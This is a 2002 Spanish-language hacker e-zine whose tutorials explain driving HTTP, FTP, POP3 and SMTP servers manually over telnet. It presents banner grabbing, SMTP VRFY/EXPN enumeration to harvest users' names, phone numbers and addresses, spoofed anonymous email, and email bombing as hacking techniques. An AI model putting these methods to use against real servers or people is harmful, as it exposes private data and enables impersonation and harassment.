
              %%%%%%%%%%%%%%%%%%%%%     
             %%%%%%%%%%%%%%%%%%%%%%           Colhackers Magazine
             %%%                %%%           Abril 17 de 2002
             %%%   ColHackers   %%%           Volumen 1, Numero 1
             %%%                %%%       
             %%% $$$$$$$$$$$$$$ %%%
                 $$$$$$$$$$$$$$               Editor: cAd|
                 $$          $$         
                 $$ MAGAZINE $$               E-mail: colhackers@bigfoot.com
                 $$          $$    
                 $$$$$$$$$$$$$$
                 $$$$$$$$$$$$$$
             
          ÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑ
          ÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑÑ         
          ÑÑÑ       
          ÑÑÑ    HHH     HHH      A      CCCCCCC   K    K
          ÑÑÑ    HHH     HHH    AA AA    CC        KK KK
          ÑÑÑ    HHH     HHH   AA   AA   CC        KKKK
                 HHHHHHHHHHH  AA AAA AA  CC        KKK      VOLUMEN 1
                 HHH     HHH  AA  A  AA  CC        KKKK
                 HHH     HHH  AA     AA  CC        KK KK
                 HHH     HHH  AA     AA  CCCCCCC   KK   K
   
                                     x        URL: http://colhackers.8k.com
                                    x%%x 
                                     x%x 
                 %%%%           %%%%  % 
           x    %   %%%%%%%   %%%  % %% 
           %%   %         %%%%%    %%%  
          x%x%%%                        
          x%x                            
                          ~@ @~
                Todos los cementerios del mundo estan llenos de gente q se
                       consideraba imprescindible.           
                                           ~@ @~            
                            
                             


                       _ _            _    _
                      | | | ___  ___ | |__<_>._ _  ___
                      |   |<_> |/ | '| / /| || ' |/ . |
                      |_|_|<___|\_|_.|_\_\|_||_|_|\_. |
                                  ___ ._ _        <___'
                                 / ._>| ' |
                     ___       _ \___.|_|_|   _    _
                    |  _> ___ | | ___ ._ _ _ | |_ <_> ___
                    | <__/ . \| |/ . \| ' ' || . \| |<_> |
                    `___/\___/|_|\___/|_|_|_||___/|_|<___|


http://colhackers.8k.com (Web oficial de colhackers)
#colhackers IRC-DALNET

[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[[]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]]
- DISCLAIMER 										   *
- A la mierda, logicamente esta publicación underground no tendra la culpa *
- de la información que aki sea dada, cada uno es culpable de su propia    *                          *
- existencia.                                                              *  
-                                                                          *
- cAd|                                                                     * 
{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{{}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}}



                        ~~~~~~~~~~~~~~~~~~~~~~~~~~
                        |       CONTENIDO        |
,.´`^   ¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼
`-´.    º 1)- Editorial                         º  COLHACKERS   º
. . `,  ¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¹               º
`-´.´   º 2)- Manejo de Protocolos manualmente  º      cAd|     º
,.^*-´  ÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ                º
´.´*,;  º 3)- HTTP, FTP, POP, SMTP, Hacking     º      cAd|     º
`-´.    ¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¹               º
  `^-´. º 4)- BANNERS? Hosting Gratuito         º      cAd|     º
.*-´    ¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¹               º
`^-´.´, º 5)- Crash win9x/ME                    º      cAd|     º
 ,.´`   ÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅÅ¹               º
`-´.^   º 6)- Programacion Batch - *.bat        º      cAd|     º
`-´.    ¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¹               º
   ^    º 7)- Un poco de Ingenieria Social      º      cAd|     º
        ¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¹               º
        º 9)- Despedida                         º  Colhackers   º
        ¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼¼ÊÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ¼

                 
ÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎ
           
Esta es una de las pocas publicaciones underground  q' han salido en 
nuestro pais, e-zines como INTRUSOS, o Trenchcoat Diaries desaparecieron de
la nada, de pronto asesinados o tal vez reclutados por las FARC, bueno son
conjeturas pero algo dejaron en la red, una marca que ganaron por atreverse
a ofrecer un poco de informacion.
Esto es lo que pretendemos con Colhackers, informar y convertirnos en
punto donde la informacion fluya libremente como submundo de colombia,
hace falta mucho mas de lo que yo podria decir aqui para un pais tan sumido
en la miseria y la guerra, somos participes de un pais en la mediocridad,
no importa que hagamos o dejemos de hacer, somos el tercer mundo, moriran
muchas generaciones antes de salir de nuestra catastrofe casi proxima, no
se quien seas.. pero se que eres uno mas,
te daras cuenta que este ezine no es muy tecnico, solo quiero poner un
ladrillo y animar a que alguien ayude con unos cuantos mas...
El ezine es algo asi como la rememoración de viejos tiempos, esta version
txt es eso... conseguiras todo y mas en la web o en el canal



Solo frente a la pantalla virtual 
encargo mi humanidad 
entera
al portal aleatorio de lo inocuo: 
"siempre le tuviste miedo a las esfinges" 

Has despertado con el rozar de un ratón por encima de tu cabeza y te estremeces 
-joven escritor-hasta el ultimo vello de tu cuerpo: 
¡mas un roedor que se desliza agazapado entre tus cabellos,
es solo un roedor buscando a otro roedor ¡.

La muerte aquella implacable mujer
me seduce 
cada vez que camino turbio
por el centro 
exclamando:
"hasta que no te tenga reposando en mi lecho eterno,
no serás totalmente mío " 
y ella paciente
todos estos años me acompaña en las mesas y esquinas de los bares tratando en vano de alcanzarme:
"el dragón ha abierto una vez más sus fauces, una mujer se ha cruzado de piernas" 

Ingreso a mi password
y busco tu Email "
no sabes la ansiedad
que he tenido de hablarte en estos días" 
contigo ahora, somos dos
en este fragor intenso
de imágenes rotas
"yo creo paraísos
donde tu cuerpo no existe" 

                   Diario de un Ciberpunk

	
                   
                                (parceros.... !!!!!!!!)

Editor

ÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎÏÎ

                            2)- Protocolos

Cuantas veces no habras usado un navegador para ver una pagina web o habras
entrado en un sitio FTP, pero te has preguntado que hay detras de la bonita
cara del explorador, como es q logras ver una pagina web o leer tu cuenta de
email? si has llegado hasta aki tal vez si, aunque sea algo muy basico es
algo q tendras que aprender obligadamente si quieres empezar en el hacking,
utilizar los protocolos manualmente, te puede dar importantes piezas de
informacion que podras utilizar en tu beneficio, como el sistema operativo q
esta corriendo el servidor, la version. etc

2.1 Q es un Protocolo?

1 - Un arreglo de reglas y regulaciones, similar a un lenguaje.
Cuando dos pcs conocen el mismo protocolo, pueden usarlo para comunicarse
entre si. 
2 - Un lenguaje comun que es usado por computadores para intercambiar informacion
entre los diferentes componentes de hardware, diferentes ordenadores en una
red etc

Existen muchos protocolos, entre ellos:

FTP Puerto 21 (File Transfer Protocol) Protocolo de transferencia de archivos

POP Puerto 110 (Post Office Protocol)
 el que utilizas comunmente cuando lees tu email a travez de una cuenta no
 basada en web, como las que provee tu ISP ------> Proveedor de Servicios de
 Internet

SMTP Puerto 25 (Simple Mail Transfer Protocol)
 es el usas cuando envias un email a travez de un programa de correo, outlook
 eudora, etc

HTTP Puerto 80 (HyperText Transfer Protocol) o Protocolo de transferencia de
Hipertexto
seguramente el de + uso diario :P pues bien, empezaremos con este.

<=======================================================================>
                               3.1) - HTTP
<=======================================================================>

Que pasa realmente cuando se escribe una URL(Uniform Resource Locator) en la
barra de direcciones del navegador? Bien, primero el browser hace un query
dns y convierte el domain en el lenguaje humano (como hotmail.com) en lenguaje
maquina, la direccion IP, el explorador se conecta a la direccion IP del Host,
se conecta al puerto 80 (El puerto predeterminado del Daemon HTTP)de la maquina
remota y pregunta por un documento particular o pagina por medio de los 
comandos HTTP.
HTTP o (HyperText Transfer Protocol) es el protocolo usado por los browsers
para comunicarse con los hosts o para enviar datos al servidor. Nosotros nunca
nos damos cuenta de este proceso que ocurre automaticamente.
En esta seccion aprenderemos a hacer manualmente lo q' el browser hace
automaticamente.
Cuando el explorador pregunta por un archivo en una URL especifica se dice
que 'request' por informacion. Antes de seguir veamos un request tipico
de HTTP:

GET url HTTP/1.1
Host:www.dominio.com

Veamos las partes especificas de los 'request'. La primera palabra, la parte
de 'get' es llamada el metodo. Hay 3 tipos de metodos principales-:

GET

El metodo 'get' es el metodo mas comunmente usado. Es con 'get' que el browser
pregunta por paginas o documentos (request), en esta clase de metodo, tu eres
el cliente y preguntas por una pagina de el servidor, que es el host al cual
estas conectado.

POST

El metodo 'post' es usado para subir archivos al servidor (upload), cuando
adjuntas un archivo a una cuenta email de web o cuando subes tu pagina, no 
por FTP, pero a travez de de una pagina HTML, en este metodo hay una vuelta
de hoja y tu te vuelves el servidor, pasando el host al q estas conectado a
ser el cliente.

HEAD

El metodo 'head' es el metodo menos popular, no muchas personas saben acerca
de este y no es muy comunmente usado. En todo caso es una parte de los metodos
HTTP. Se usa el metodo 'head' cuando deseas asegurarte que un archivo existe
en una direccion especifica sin descargar el archivo entero. Este metodo solo
descarga la informacion de cabezera del archivo (Header) y no el archivo completo.

***************
Nota: Al enviar un comando HTTP, se debe presionar ENTER dos veces.
***************

Sigamos con un poco de teoria.
La primera parte de los request del browser son los metodos ahora la segunda
es la direccion URL, veamos este request:

GET /evil.htm  HTTP/1.1

Puedes preguntarte de donde vino el '/'. Por ejemplo si la pagina por la que
estas preguntando es http://www.mocosoft.com/windows.htm entonces el URL
sera lo que esta despues de remover http:// y el nombre de dominio 
www.mocosoft.com. Asi que el URL seria /windows.htm.

Bien, entonces cual sera el URL cuando quieres acceder a la pagina de inicio
digamos de colombia.com, tu normalmente escribes http://www.colombia.com/ en
la barra de direcciones del explorador. ahora si removemos http:// y el nombre
de dominio (www.colombia.com) que queda.
Bien esto significa q el URL del HTTP request q' necesitamos es '/' 
Asi el request HTTP seria:

GET / HTTP/1.1
Host:www.colombia.com

Pues bien, la tercera parte del request es muy logica. El HTTP/1.1 especifica
la version del servicio HTTP usada por el explorador. Asi si un server esta
corriendo HTTP/1.1 y un browser q' esta corriendo HTTP/1.0 pide una pagina
al server, este enviara la pagina en terminos de HTTP/1.0.

Esto es lo que recibo cuando pido la pagina inicial de cibertol.com :

GET / HTTP/1.1
-.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.- 
HTTP/1.1 400 Bad Request
Date: Thu, 11 Apr 2002 13:02:49 GMT
Server: Apache/1.3.20 (Unix) FrontPage/5.0.2.2510
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=iso-8859-1
 
127
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
                                                  <HTML><HEAD>
                                                              <TITLE>400 Bad Req
uest</TITLE>
            </HEAD><BODY>
                         <H1>Bad Request</H1>
                                             Your browser sent a request that th
is server could not understand.<P>
                                  client sent HTTP/1.1 request without hostname
(see RFC2616 section 14.23): /<P>
                                 </BODY></HTML>
-.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.- 

puedes ver q' devuelve un mensaje de error, en algunos servidores debes especificar el host
asi q' para que nos devuelva la pagina inicial de cibertol.com escribimos:

GET / HTTP/1.1
HOST:WWW.CIBERTOL.COM

y el server responde con:

-.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--

HTTP/1.1 200 OK
Date: Thu, 17 Apr 2002 13:03:09 GMT
Server: Apache/1.3.20 (Unix) FrontPage/5.0.2.2510
Last-Modified: Thu, 11 Apr 2002 12:53:34 GMT
ETag: "2f7add-12bd5-3cb5874e"
Accept-Ranges: bytes
Content-Length: 76757
Content-Type: text/html
 
 
<html>
<!-- #BeginTemplate "/Templates/primerapagina.dwt" -->
<head>
<title>CIBERTOL.COM - La Guia de Ibagué y el Tolima en la RED</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<meta name="keywords" content="Tolima, Colombia, Ibagué, musica, music, cibertol
, toliweb, Ibagué, IBAGUE, TOLIMA, ciudad musical, tolimense, eventos, ciberespa
cio, guia ">
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<script language="JavaScript">

-.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.--.-.-
 
BUenO, bueno, aki se extiende en unos cuantos kbs la pagina asi que no pondre el codigo completo....

Ahora que conoces como funciona el protocolo, vamos a hacerlo manualmente,
necesitas un cliente telnet para hacer esto, sabras lo importante que
es Telnet en la artilleria de un hacker :P.
Abre tu cliente telnet y conectate a cualquier host en el puerto 80, si el
host al que estas intentando conectarte no tiene una pagina web, no tendra
el puerto 80 abierto y recibiras un mensaje de error.
Si la conexion es realizada, el cliente telnet mostrara en la barra de titulo
el nombre del dominio al que te conectaste y estara listo para los comandos...

Escribe GET (o cualquier otro metodo) y presiona enter dos veces.

el servidor te devolvera un mensaje de error:

HTTP/1.1 400 Bad Request
Server: Netscape-Enterprise/3.5.1

Te devolveran la version de HTTP que se esta corriendo (no muy importante),
el codigo asociado con el error y el mensaje de error (tampoco
muy importante), pero tambien te devuelve el sistema operativo (OS) y la
version que se esta corriendo.

Ahora veamos que pasa cuando tu escribes un autentico comando HTTP.
Despues de hacer un telnet al puerto 80 de www.netscape.net tipeamos:

GET / HTTP/1.1
HOST:WWW.NETSCAPE.NET

(pedimos la pagina inicial de netscape.net - )
 
HTTP/1.1 200 OK
Server: Netscape-Enterprise/4.1
Date: Wed, 17 Apr 2002 14:06:54 GMT
Content-type: text/html
Transfer-Encoding: chunked
 
3c6f
<!-- HEAD.HTML -->
                  <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
>
 <HTML>
       <HEAD>
               <TITLE>Netscape.com</TITLE>
                                            <STYLE TYPE="text/css">
                                                                     <!--
                                                                             A {
text-decoration:none;}
                          A:hover {text-decoration:underline;}
 
                                                                  .bluepollold {
 background-color: #99CCFE }
                                .bluepoll { background-color: #99CCFE; font-size
: 11px; }
 
             .fsize2 {font-family: Arial, Helvetica, sans-serif; font-size: 11px
;}
      .fsize3 {font-family: Arial, Helvetica, sans-serif; font-size: 13px;}
                                                                               .
s0Cb  {font-family: Arial, Helvetica, sans-serif; font-size: 10px; color: #00336
6;}
       .s0Cc  {font-family: Arial, Helvetica, sans-serif; font-size: 10px; color
: #99CCFF;}
               .s0Cd  {font-family: Arial, Helvetica, sans-serif; font-size: 10p
x; color: #CCCCCC;}
 
                       .s1cA  {font-family: Verdana, Arial, Helvetica, sans-seri
f; font-size: 10px; color: #000000;}
                                        .s1cAb  {font-family: Verdana, Arial, He
lvetica, sans-serif; font-size: 10px; color: #000000; font-weight:bold;}
                                                                            .s1c
B  {font-family: Verdana, Arial, Helvetica, sans-serif; font-size: 10px; color:
#003366;}
             .s1cBb  {font-family: Verdana, Arial, Helvetica, sans-serif; font-s
ize: 10px; color: #003366; font-weight:bold;}

***** etc etc


El metodo get devuelve el codigo HTML de la pagina que hayas pedido.
Lo mismo que seleccionar en el explorador Ver -> Codigo Fuente

Similarmente puedes ver que pasa cuando usas los metodos 'Post' y 'Head' 
simplemente remplazando 'Get' con el metodo que desees usar.

Por ejemplo:

HEAD / HTTP/1.1 
o
POST / HTTP/1.1

****************

Devolvamonos un poco a la respuesta que recibimos del daemon HTTP cuando el
metodo get fue aceptado por cibertol.com. La primera linea de la respuesta
fue:

HTTP/1.0 200 OK

Ahora, que significa el 200?
Pues bien, el 200 es llamado el codigo de estatus. Cuando un comando es dado
al servidor, este lo procesa y devuelve un codigo de acuerdo al resultado.
Un codigo de estatus contiene 3 digitos en el formato de xxx, van desde 1xx
hasta 5xx. 

1xx - Informativo - Request recibida, continuando el proceso (Raramente encontrados)
2xx - Terminacion completa del comando dado.
3xx - Errores dado al cambio de sitio de documentos
4xx - Errores por parte del server.
5xx - Errores por parte del cliente.

El codigo de estatus mas comun es el 200, cuando logras ver completamente el
documento que hayas pedido en tu browser. 
El q si debes haber visto algunas veces es el Error 404---No encontrado
Este mensaje de error te informa que el URL al que estas intentando acceder
no ha sido encontrado, ha sido movido, borrado o el link desde el cual has
venido esta errado.


::::::::::::::
Nota: Los servidores HTTP no mantienen una conexion estable, cada vez que das
un comando se procesara, te enviaran la informacion y x ultimo te desconectaran
Loguea la sesion de telnet.
::::::::::::::

Especificación completa sobre el Protocolo HTTP:

http://www.w3.org/Protocols/rfc2616/rfc2616.html


Lista de protocolos estandar de internet:

http://rfc.postgrado.uc.edu.ve/rfcxx00.html


<=======================================================================>
                                  3.2)- FTP
<=======================================================================>

Que es Ftp?
------------------------------------
Ftp (File Transfer Protocol - Protocolo de Transferencia de Archivos)

Te permite, descargar y subir archivos del servidor con gran facilidad y
velocidad si tienes el permiso suficiente para hacerlo. Tu exploras un sitio
FTP con tu browser de la misma manera en que exploras archivos y carpetas en
tu propia PC, obviamente depende de los privilegios de acceso que tengas en
el servidor.

Comandos FTP
------------
Para comunicarte con un daemon de FTP, solo tienes que conectarte con telnet
en el puerto 21 (predeterminado de FTP) y usar los siguientes comandos:

cd      cambiar directorio (en el servidor)
lcd     cambiar directorio local (cuando envias un archivo la carpeta del
        mismo sera la que especifiques con lcd)
dir,ls  lista del Directorio
binary  cambiar modo a transferencia binaria
get     Pedir un archivo
mget    pedir muchos archivos
put     enviar un archivo
mput    enviar muchos archivos
pwd     directorio actual en el servidor
syst    te devuelve la version y nombre del daemon que se esta corriendo
help    en algunos daemons, te da una lista de todos los comandos disponibles

El comando SYST revela informacion importante del sistema para la conexion
entre cliente y servidor. Solo ingresa al servidor usando nombre de usuario
y pasw cualquiera o como un usuario anonimo nombre de usuario:anonymous
pasw:cualquier@direccion.com y tipea el comando SYST. Ten en cuenta que la
informacion SYST puede ser falsa. 


Notas
+++++++++
1. Hay montones de clientes FTP que haran todo el trabajo por ti, pero no 
esta de + saber un poco.

<=======================================================================>
                                  3.3)- POP3
<=======================================================================>

Que es POP3?
.............
POP es una abreviatura para  (Post Office Protocol). Este es el protocolo
usado para chequear cuentas de email no basadas en WEB.

Una cuenta de email basada en WEB solo puede ser usada a travez de cierta
pagina web. Mientras revisas tu correo te llenan de banners y propaganda
por proveerte gratuitamente de email. Las cuentas pop3 te proporcionan mas
espacio y casi siempre son dadas por el ISP que uses.

Una cuenta de email no basada en web es accedida a travez de un cliente de
email como el Eudora o Outlook o a travez de telnet, si conoces el 
protocolo.

Las cuentas no basadas en web usan dos protocolos - SMTP (Simple Mail Transfer
Protocol) para enviar email y POP (Post Office Protocol) para recibir email. 
POP3 es solo una nueva version de POP

Porque desearias aprender el protocolo POP3?
...........................................
Siempre puedes estar expuesto a recibir una bomba de email, si no te ha
pasado puedes imaginarte como es el recibir cientos de emails y tener que
borrarles 1 x 1, el conocer el protocolo te puede ayudar en ciertos casos
o simplemente te puede ayudar a hackear una cuenta.
Hay programas que te ahorran todo el trabajo pero como he dicho antes un poco
de conocimiento no esta de +, abriendo el email desde telnet, puedes por ej,
ver el encabezado completo de un email que te dara toda la informacion, desde
que servidor viene, desde que IP fue enviado. etc

POP3 no es nada del otro mundo.


Muy bien, Ahora vamos al .
..................
Lo primero q' necesitas es un cliente de telnet cualquiera. Unix tiene un
cliente telnet nativo (simplemente escribe telnet hostname/IP para hacer una
conexion al puerto 23 o telnet hostname/IP puerto y escoge un puerto)
Windows viene con una aplicacion telnet esta en c:\windows\telnet.exe pero
puedes acceder a ella, desde Inicio - Ejecutar y escribe telnet.

Ahora necesitas buscar tu servidor de email. Suele ser algo como 
mail.tu-isp.com. POr ejemplo: si mi email es cad@multiphone.net.co
Puede ser mail.multiphone.net.co o pop.multiphone.net.co ( Puedes encontrar
una lista de servidores de email colombianos en http://colhackers.8k.com/popsmtp.htm
Si ya tienes un cliente de email configurado como el outlook solo mira en las
opciones y encontraras el servidor pop3 y smtp de tu ISP
Bien, Ahora daremos un telnet al server en el puerto 110(el puerto
predeterminado para pop3)
Este es el mensaje q recibo cuando me conecto al servidor de mi ISP:

+OK POP3 [200.21.46.6] v4.3 server ready

Ahora necesitamos identificarnos. Debemos dar un nombre de usuario
y contraseña. Asi si mi email es cad@multiphone.net.co, mi nombre de 
usuario seria cad. Entonces escribo en el telnet:

user cad (o cualquiera q sea tu nombre de usuario)

Y el servidor responde con:

+OK User name accepted, password please

ahora el pasw ue? asi q' escribimos:

pass tu-password

Y el servidor responde con:

+OK Mailbox open, x messages (Cuando x es el numero de mensajes que tienes
en tu INbOx)

o con:

-ERR Bad login

Si tipeamos el pasw equivocado. 
Para ver la lista de emails en el inbox escribe list, encontraremos un numero
q identifica cada nuevo email y un numero q identifica el tamaño de cada
mensaje. Ahora, lo siguiente seria leer nuestros mensajes. Para hacer esto 
debemos escribir retr # (# sera remplazado por el numero del mensaje que 
queremos abrir, ahora tendremos un email con su encabezado completo (Full
Header) y el cuerpo del mensaje (Body).

Para borrar un mensaje, escribimos dele # (donde # es el numero del mensaje
a borrar)

Cuando hayas terminado escribe quit para cerrar la sesion.

Notas Finales
...........
bueno, eso es todo! Breve no?
Solo hay una cosa mas, cuando estas dentro de la cuenta, un archivo de bloqueo
es creado, asi nadie mas puede entrar mientras tu estas logueado.
Bueno realmente Facil...

c_a_d@hotmail.com
http://colhackers.8k.com
4/6/2002

<=======================================================================>
                                  3.4)- SMTP
<=======================================================================>

Que es SMTP?
............
SMTP (Simple Mail Transfer Protocol)
El SMTP provee mecanismos para la transmision de email directamente desde el
host del usuario que envia hasta al host del usuario que recibe, a travez de
este tipo de servidores es q puedes enviar un mail anonimo o una bomba de email
con un simple script que utilize comandos de SMTP, o a travez de uno de los
programas para email bombing que abundan en internet... (lameryzer.com)

Generalmente, por no decir que todos los servidores SMTP que hay en nuestro
pais son bastante inseguros, algunos servidores permiten que con solo saber
tu cuenta de email, yo pueda averiguar tu nombre, tu numero de telefono y
hasta la direccion de tu casa, vaya mierda!!! y aun piensas que hay anonimidad
en internet, sobretodo ahora que los ISPs loguean el # de tel desde el que
tiene acceso a internet determinada cuenta...

Por ej:
Si tu cuenta de email es fedor@dostoyevski.com, asumo en 1er lugar que tu ISP
seria dostoyevski.com, abro telnet y me conecto a dostoyevski.com en el puerto
25 (el de SMTP), cuando el server este listo escribo:

VRFY fedor

y si tienes una porqueria de servidor como el que yo utilizaba te devuelve
algo como:

-0033456785098-Fedor Chibchombia-Terramoda S.A-<Fedor@dostoyevski.com>

Adivinaras facilmente cada pieza de información que te devuelve el servidor,
 donde queda tu anonimidad?

ya volviendo al tema

En algunos server antes de realizar cualquier transaccion SMTP debes algo asi
como saludar al servidor para decirle quien eres, para esto se usa el comando
HELO o EHLO:

-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
HELO mixmail.com
250-Hello mixmail.com; <tudireccionip>
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.


PROCEDIMIENTOS SMTP
..................

Hay 3 pasos para una transaccion de email SMTP, la transaccion empieza con el
comando MAIL que da la informacion de la persona que envia el email, sigue una
serie de comandos RCPT que son los recipientes del mensaje a enviar y finaliza
con DATA, que es el mensaje a enviar, la transaccion es procesada cuando termina
el comando DATA.

MAIL
Este comando le dice al servidor SMTP que una nueva transaccion esta empezando
y resetea cualquier estado actual, especifica quien envia el mensaje, puede
ser dejado en blanco. Su uso seria:

-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
MAIL FROM:<c_a_d@hotmail.com>
(Si el Sender es valido el servidor contestara con:)
250 Ok Sender is valid

MAIL FROM:<>
250 Ok Sender is Valid

(El segundo paso en el procedimiento es indicar el mail o los mails a donde va
dirigido el mensaje:)

RCPT TO:<jijuemadre@multiphone.net.co>
250 Ok

RCPT TO:<bgates@microsoft.com>
250 Ok

(El tercer paso es especificar el mensaje a enviar, aqui es donde se ponen las
partes del email:)

DATA
354 Start mail input; end with . in a line itself
To:Mocosoft President
Cc:any@someone.com
Bcc:anyone@some.com
From:uejeje
Subject:A la mierda..

Uno que otro hoyo de seguridad...
.
250 ok Mail Accepted for delivery
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.


Comandos Adicionales
....................
SMTP provee comandos adicionales para verificar un nombre de usuario o expandir
una lista de emails.

VRFY (Verify)
Con este comando puedes saber si un usuario existe en el servidor, a veces
puedes conseguir mucha información solo con tener el email de una persona.
El servidor puede responder con:

-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
VRFY nombre

-otrosdatos - Nombre -<email@dominio.com>
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

o simplemente con el nombre del email, <email@dominio.com>.

EXPN (Expand)
Este comando sirve para expandir una lista de emails, si la lista tiene por
nombre CibeR y contiene 3 emails el servidor responde algo como:

-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.
EXPN ciber
250-Master Champeta <mrc@dominio.com>
250-igüazo Maria <iguazo@dominio.com>
250-<nn@dominio.com>
-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.-.

Es = que hacer un vrfy a cada usuario de la lista.
----------------------------------------------------------------------------
Nota:Algunas veces los ISP usan las "mailing list" para enviar mensajes a todos
sus usuarios de un solo tajo o para vender el envio de propaganda. En la ISP
de mi pueblito (ibagué papa) por ej: utilizan una mail box llamada ALLUSERS,
que provee la lista de todos los usuarios con sus respectivos nombres, dir y
Tel; al dar un comando "EXPN allusers".
Algunos Administradores sobretodo en Colombia son muy obvios al nombrar estas
mailing list, solo debes buscar algo como allusers, tolinetusers (en el caso
de mi ISP), clientes, usuarios, etc
----------------------------------------------------------------------------

A continuación expondre la lista completa de comandos SMTP:

HELP ---> Te devuelve los comandos disponibles en el servidor y te da infor
          macion sobre cada comando. Solo en algunos SMTP, la mayoria SENDMAIL

NOOP ---> No hace absolutamente nada, ni afecta la transaccion en proceso.

QUIT ---> Finaliza la sesion

RSET ---> Resetea el estado actual. Cancela cualquier transaccion en proceso.
          (Notese que despues del Mensaje: "250-Mail Accepted for delivery"
          el mail ya es enviado)

HELO ---> Identifica el servidor SMTP que envia al SMTP server q recibe, por
          lo tanto si pones MAIL FROM:<c_a_d@hotmail.com> deberias saludar al
          servidor con HELO hotmail.com

MAIL ---> Especifica quien envia el mensaje.

SEND ---> Se utiliza en remplazo de MAIL, si se desea mandar un mensaje a un
          terminal activo, si el terminal no esta activo o no acepta este tipo
          de mensajes. Se produce un error. Ej: SEND FROM:<mi@email.com>

SOML ---> Al = que SEND, pero si el terminal no esta activo , el mensaje es
          enviado a la cuenta mail del usuario. Ej: SOML FROM:<mi@email.com>

SAML ---> Al = que SEND pero el mensaje es enviado al terminal y tambien a
          la cuenta email del destinatario.

RCPT ---> Los recipientes. A donde va dirigido el mail. Si hay varios rcpts
          se debe usar una serie de este comando.

DATA ---> Es el mensaje en si, contiene las lineas de Asunto:, Para:, De:,
          CC: y BCC:.            

Este es un log de un mensaje enviado a travez de telnet:
telnet andinet.com puerto 25

-------------------------------------------------------------------------
220 SMTP/cmap ready_________________________________
helo cad
250 kepler.andinet.com
mail from:<>
250 MAIL FROM:<> OK
rcpt to:<c_a_d@hotmail.com>
250 RCPT TO:<c_a_d@hotmail.com> OK
data
354 Start mail input; end with <CRLF>.<CRLF>
From:Anyone in the jungle
To:cAd|
Subject:jejejrD
Email anonimo........
.
250 <3CBF1C2100001414> Mail accepted             
noop
250 NOOP
quit
250 kepler.andinet.com QUIT
-------------------------------------------------------------------------
Como enviar archivos adjuntos, sera explicado en la proxima edicion del zine
q ya estoy algo enfermo de la laringe...
ahi nos vemos

cAd|
c_a_d@hotmail.com

<=======================================================================>
                      3.5)- FTP, HTTP, POP, SMTP Hacking
<=======================================================================>

Hay muchos hoyos de seguridad para muchos de estos daemons y para muchos
sistemas operativos, el mejor camino que encuentro es explicar como puedes
encontrarlos en la web, algunos de estos exploits seran analizados a fondo
en proximas ediciones de este e-zine.

Busca en las siguientes direcciones:
www.securityfocus.com
CERT (Computer Emergency Response Team) - http://cert.org
X-Force Search (simplest) - http://www.iss.net/cgi-bin/xforce/xforce_index.pl
Packet Storm - packetstorm.genocide2600.com
BugTraq Archives - http://www.securityfocus.com/level2/bottom.html?go=search
Fyodor's Exploit World - http://www.insecure.org/sploits.html
